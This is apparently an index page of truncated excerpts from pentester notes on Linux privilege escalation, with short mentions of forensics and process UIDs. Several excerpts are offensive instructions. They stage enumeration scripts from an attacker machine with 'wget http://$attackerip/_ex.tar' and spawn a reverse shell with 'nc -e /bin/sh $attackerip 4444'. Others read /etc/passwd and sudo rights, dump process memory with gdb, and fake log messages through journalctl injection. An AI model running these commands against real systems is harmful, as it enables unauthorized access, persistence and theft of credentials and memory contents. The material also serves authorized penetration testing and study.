-
CAINE can be used as a live system to perform forensic studies of a system (e.g. after a Incident).
-
The four process ID’s For each process, Linux manages four UID’s. When a process from a user with UID 1000 is started/forked, then the new process has normally also the UID 1000. However, with SUID/GUID it becomes more complicated, since processes can get other UIDs than the one of the caller. When a process like passwd…
-
Prepare the own system: cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80 Prepare the target: cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script Now, execute it: LinPeas: ./linpeas.sh LinEnum: ./LinEnum.sh linux-smart-enumeration: ./lse.sh ‑l1 linux-exploit-suggester‑2: ./linux-exploit-suggester‑2.pl sudo-killer: ./SUDO_KILLERv2.0.5.sh linuxprivchecker: ./linuxprivchecker.py Finally: Copy typescript file to the PentestManager!
-
If your console is narrow, widen it at the beginning: stty rows 50 cols 200 Consider to directly spawn another reverse shell: nc -e /bin/sh $attackerip 4444 & Basic enumeration about the host idgroupscat /etc/passwdcat /etc/groupcat /etc/hostscat /etc/fstabuname -a // Check for kernel exploits // ALSO search for kernel exploits with OS name! // If this…
-
It is possible to write as a user arbitrary text into the logs. Messages can be faked which could alert persons/surveillance systems. https://turbochaos.blogspot.com/2014/08/journalctl-terminal-escape-injection.html?view=classic
-
1. Manual enumeration id pwd uname -a // are there kernel exploits? cat /etc/hosts cat /etc/passwd ls -lah /etc/passwd cat /etc/group cat /etc/fstab cat /etc/crontab df cd /home && ls ... // or execute ls -lahR /home/ cd /root && ls ... netstat -antup ps aux sudo -l su // if passwords are already known…
-
Afterwards: See Analyzing memory Linux Prozess memory dump Find out which memory segments are used by an application via its PID: cat /proc/<pid>/maps Dump the used memory from an application: (credit) #!/bin/bash grep rw-p /proc/$1/maps \ | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ | while read start stop; do \ gdb --batch --pid $1 -ex \…